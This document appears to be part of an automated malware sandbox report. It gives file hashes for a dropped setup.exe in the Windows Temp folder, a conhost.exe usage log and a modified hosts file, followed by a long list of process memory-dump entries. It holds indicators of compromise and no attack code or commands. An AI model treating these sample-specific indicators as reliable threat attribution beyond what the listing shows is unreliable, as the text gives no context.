                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                Filesize

                                                539B

                                                MD5

                                                84f2160705ac9a032c002f966498ef74

                                                SHA1

                                                e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                SHA256

                                                7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                SHA512

                                                f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                              • C:\Windows\system32\drivers\etc\hosts
                                                Filesize

                                                1KB

                                                MD5

                                                f3f6968a4c0f457f427eb17f7cc5f68b

                                                SHA1

                                                872933578f4b7d555158189ed02015f192daa7c6

                                                SHA256

                                                774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                SHA512

                                                5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                              • memory/412-544-0x0000000000000000-mapping.dmp
                                              • memory/460-345-0x0000000000000000-mapping.dmp
                                              • memory/624-344-0x0000000000000000-mapping.dmp
                                              • memory/1356-563-0x0000000000000000-mapping.dmp
                                              • memory/1412-558-0x0000000000000000-mapping.dmp
                                              • memory/1488-555-0x0000000000000000-mapping.dmp
                                              • memory/1488-356-0x0000000000000000-mapping.dmp
                                              • memory/1584-543-0x0000000000000000-mapping.dmp
                                              • memory/1584-351-0x0000000000000000-mapping.dmp
                                              • memory/1636-542-0x0000000000000000-mapping.dmp
                                              • memory/1664-349-0x0000000000000000-mapping.dmp
                                              • memory/1780-339-0x0000000000000000-mapping.dmp
                                              • memory/1804-290-0x000001AEC2D40000-0x000001AEC315C000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/1804-288-0x000001AEDDFE0000-0x000001AEDE3FC000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/1880-588-0x000002C818270000-0x000002C818277000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/1880-585-0x000002C818990000-0x000002C818996000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/1880-350-0x0000000000000000-mapping.dmp
                                              • memory/1924-352-0x0000000000000000-mapping.dmp
                                              • memory/2140-365-0x0000000000000000-mapping.dmp
                                              • memory/2168-554-0x0000000000000000-mapping.dmp
                                              • memory/2184-556-0x0000000000000000-mapping.dmp
                                              • memory/2228-541-0x0000000000000000-mapping.dmp
                                              • memory/2300-552-0x0000000000000000-mapping.dmp
                                              • memory/2324-146-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-142-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-151-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-152-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-153-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-154-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-155-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-157-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-156-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-158-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-159-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-160-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-161-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-162-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-163-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-164-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-165-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-166-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-167-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-168-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-169-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-170-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-171-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-172-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-173-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-174-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-175-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-176-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-177-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-178-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-179-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-180-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-181-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-149-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-148-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-147-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-145-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-144-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-363-0x0000000000000000-mapping.dmp
                                              • memory/2324-119-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-143-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-150-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-120-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-121-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-141-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-122-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-140-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-139-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-123-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-137-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-118-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-138-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-136-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-135-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-134-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-124-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-133-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-125-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-126-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-127-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-132-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-131-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-130-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-129-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2324-128-0x0000000077630000-0x00000000777BE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2416-562-0x0000000000000000-mapping.dmp
                                              • memory/2516-341-0x0000000000000000-mapping.dmp
                                              • memory/2660-553-0x0000000000000000-mapping.dmp
                                              • memory/2660-354-0x0000000000000000-mapping.dmp
                                              • memory/2860-361-0x0000000000000000-mapping.dmp
                                              • memory/2964-340-0x0000000000000000-mapping.dmp
                                              • memory/2984-560-0x0000000000000000-mapping.dmp
                                              • memory/3024-575-0x0000000000000000-mapping.dmp
                                              • memory/3060-446-0x0000025CD5BD0000-0x0000025CD5BDA000-memory.dmp
                                                Filesize

                                                40KB

                                              • memory/3060-413-0x0000025CD5D60000-0x0000025CD5E19000-memory.dmp
                                                Filesize

                                                740KB

                                              • memory/3060-407-0x0000025CD5BB0000-0x0000025CD5BCC000-memory.dmp
                                                Filesize

                                                112KB

                                              • memory/3060-389-0x0000000000000000-mapping.dmp
                                              • memory/3172-566-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/3172-547-0x0000000000401BEA-mapping.dmp
                                              • memory/3172-579-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/3508-574-0x0000000000000000-mapping.dmp
                                              • memory/3708-303-0x00000238D3870000-0x00000238D3892000-memory.dmp
                                                Filesize

                                                136KB

                                              • memory/3708-297-0x0000000000000000-mapping.dmp
                                              • memory/3708-368-0x0000000000000000-mapping.dmp
                                              • memory/3708-306-0x00000238D3A20000-0x00000238D3A96000-memory.dmp
                                                Filesize

                                                472KB

                                              • memory/3708-573-0x0000000000000000-mapping.dmp
                                              • memory/3772-355-0x0000000000000000-mapping.dmp
                                              • memory/3788-296-0x0000000000000000-mapping.dmp
                                              • memory/3828-576-0x0000000000000000-mapping.dmp
                                              • memory/3928-388-0x0000000000000000-mapping.dmp
                                              • memory/4232-568-0x000000014036DB84-mapping.dmp
                                              • memory/4232-578-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/4232-185-0x0000000000000000-mapping.dmp
                                              • memory/4232-577-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/4264-375-0x00007FFDDFA30000-0x00007FFDDFC0B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4264-374-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/4264-373-0x00007FFDDFA30000-0x00007FFDDFC0B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4264-372-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/4264-376-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/4264-377-0x00007FFDDFA30000-0x00007FFDDFC0B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4292-557-0x0000000000000000-mapping.dmp
                                              • memory/4320-357-0x0000000000000000-mapping.dmp
                                              • memory/4340-366-0x0000000000000000-mapping.dmp
                                              • memory/4344-564-0x0000000000000000-mapping.dmp
                                              • memory/4372-346-0x0000000000000000-mapping.dmp
                                              • memory/4572-358-0x0000000000000000-mapping.dmp
                                              • memory/4584-282-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/4584-280-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/4584-182-0x0000000000000000-mapping.dmp
                                              • memory/4584-198-0x00007FFDDFA30000-0x00007FFDDFC0B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4584-281-0x00007FFDDFA30000-0x00007FFDDFC0B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4584-197-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/4584-284-0x00007FFDDFA30000-0x00007FFDDFC0B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4616-538-0x0000000000000000-mapping.dmp
                                              • memory/4636-359-0x0000000000000000-mapping.dmp
                                              • memory/4704-347-0x0000000000000000-mapping.dmp
                                              • memory/4732-336-0x0000000000000000-mapping.dmp
                                              • memory/4764-342-0x0000000000000000-mapping.dmp
                                              • memory/4784-360-0x0000000000000000-mapping.dmp
                                              • memory/4796-186-0x0000000000000000-mapping.dmp
                                              • memory/4796-348-0x0000000000000000-mapping.dmp
                                              • memory/4800-362-0x0000000000000000-mapping.dmp
                                              • memory/4864-353-0x0000000000000000-mapping.dmp
                                              • memory/4872-565-0x0000000000000000-mapping.dmp
                                              • memory/4872-364-0x0000000000000000-mapping.dmp
                                              • memory/4908-335-0x0000000000000000-mapping.dmp
                                              • memory/4912-539-0x0000000000000000-mapping.dmp
                                              • memory/4916-559-0x00000204D80A0000-0x00000204D80B2000-memory.dmp
                                                Filesize

                                                72KB

                                              • memory/4916-545-0x00000204D8070000-0x00000204D8076000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/4940-337-0x0000000000000000-mapping.dmp
                                              • memory/4944-338-0x0000000000000000-mapping.dmp
                                              • memory/5068-343-0x0000000000000000-mapping.dmp